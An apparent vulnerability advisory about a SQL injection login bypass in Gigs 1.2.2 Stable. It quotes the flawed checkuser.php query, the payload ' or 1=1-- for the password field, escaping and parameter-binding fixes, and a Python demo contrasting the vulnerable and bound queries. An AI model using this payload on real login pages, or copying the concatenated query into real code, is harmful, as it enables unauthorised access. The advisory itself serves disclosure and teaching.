Vendor: Gigs 1.2.2 Stable
By: athos
CVSS: 7.5 (HIGH)
Title: Remote Login Bypass
CWE: 89
Product Name: Gigs 1.2.2 Stable
Affected Version From: 1.2.2002
Affected Version To: 1.2.2002
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2008

Gigs 1.2.2 Stable Remote Login Bypass Vulnerability

A vulnerability exists in Gigs 1.2.2 Stable that allows an attacker to bypass authentication by sending a specially crafted login request to the vulnerable application. The cause is that checkuser.php places the user-supplied username and password values directly into an SQL query without sanitizing them. An attacker can exploit this to gain unauthorized access to the application.

Mitigation:

The application should properly sanitize user-supplied input before using it in an SQL query; the advisory's example fix escapes both values with mysql_real_escape_string.

Exploit-DB raw data:

/* ------------------------------------------------------------------------------------------------
 * 2532|Gigs 1.2.2 Stable Remote Login Bypass Vulnerability
 * ------------------------------------------------------------------------------------------------
 * by athos - staker[at]hotmail[dot]it
 * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
 * ------------------------------------------------------------------------------------------------
 * File Vuln checkuser.php
 *
 * 16. $username = $_POST['username'];
 * 17. $password = $_POST['password'];
 * ... 
 * 41. $query = "SELECT * FROM $dbt_users WHERE username = '$username' AND password = '$password'" ;
 * 42. $result = mysql_query($query) or die ( "Error in query: $query. " . mysql_error() );
 * ------------------------------------------------------------------------------------------------
 * Exploit
 *
 * http://[host]/[path]/index.php?id=login
 * 
 * Username: [username]
 * Password: [' or 1=1--]
 * ------------------------------------------------------------------------------------------------
 * Fix (Examples)
 *  
 * $username = mysql_real_escape_string($_POST['username']); 
 * $password = mysql_real_escape_string($_POST['password']);
 * 
 * ------------------------------------------------------------------------------------------------
 */

# milw0rm.com [2008-12-18]
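The following is an added example, not part of the advisory or the Gigs code base: it rebuilds the checkuser.php query shape (line 41 above) over an in-memory SQLite table so the concatenated query and a parameter-bound replacement can be compared on the same inputs. SQLite stands in for MySQL here; the table, the single account and the function names are constructed for the demonstration.

```python
"""Concatenated vs. parameter-bound login query, modelled on checkuser.php.
SQLite replaces MySQL; '--' starts a comment in both, so the advisory's
password value behaves the same way against the concatenated query."""
import sqlite3


def setup_db():
    """Constructed sample data: one legitimate account (hypothetical table)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!')")
    return db


def login_vulnerable(db, username, password):
    """Mirrors line 41: both values are spliced into the SQL text, so a quote
    in either one changes the statement's structure."""
    query = (f"SELECT * FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return db.execute(query).fetchall()


def login_fixed(db, username, password):
    """Same query with bound parameters: the driver passes the values as data,
    so quotes and comment markers never reach the SQL parser as syntax."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchall()


def demo():
    """Return the row count each variant yields for good credentials and for
    the advisory's password value."""
    db = setup_db()
    payload = "' or 1=1--"  # the password value quoted in the advisory
    return {
        "vuln_good_creds": len(login_vulnerable(db, "admin", "S3cret!")),
        "vuln_payload": len(login_vulnerable(db, "admin", payload)),
        "fixed_good_creds": len(login_fixed(db, "admin", "S3cret!")),
        "fixed_payload": len(login_fixed(db, "admin", payload)),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows} row(s)")
```

Binding parameters removes the whole class of quote-based bypasses rather than escaping one character set, which is why it is the preferred fix over the escaping shown in the advisory; storing password hashes instead of plaintext would be the other change a reviewer of checkuser.php would ask for.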